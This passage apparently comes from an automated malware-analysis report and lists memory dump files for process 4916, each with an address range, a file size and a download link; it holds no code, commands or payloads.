10.8MB

Download
memory/4916-38-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
10.8MB

Download
memory/4916-0-0x00007FFC07BE3000-0x00007FFC07BE5000-memory.dmp

Filesize
8KB

Download
memory/4916-25-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
10.8MB

Download
memory/4916-6-0x000000001DCC0000-0x000000001DCCC000-memory.dmp

Filesize
48KB

Download
memory/4916-5-0x000000001DC40000-0x000000001DC4E000-memory.dmp

Filesize
56KB

Download
memory/4916-4-0x000000001C540000-0x000000001C54C000-memory.dmp

Filesize
48KB

Download
memory/4916-3-0x000000001C0B0000-0x000000001C1B0000-memory.dmp

Filesize
1024KB

Download
memory/4916-24-0x00007FFC07BE3000-0x00007FFC07BE5000-memory.dmp

Filesize
8KB

Download
memory/4916-2-0x00007FFC07BE0000-0x00007FFC086A2000-memory.dmp

Filesize
10.8MB

Download
memory/4916-1-0x0000000000C20000-0x0000000000C38000-memory.dmp

Filesize
96KB

Download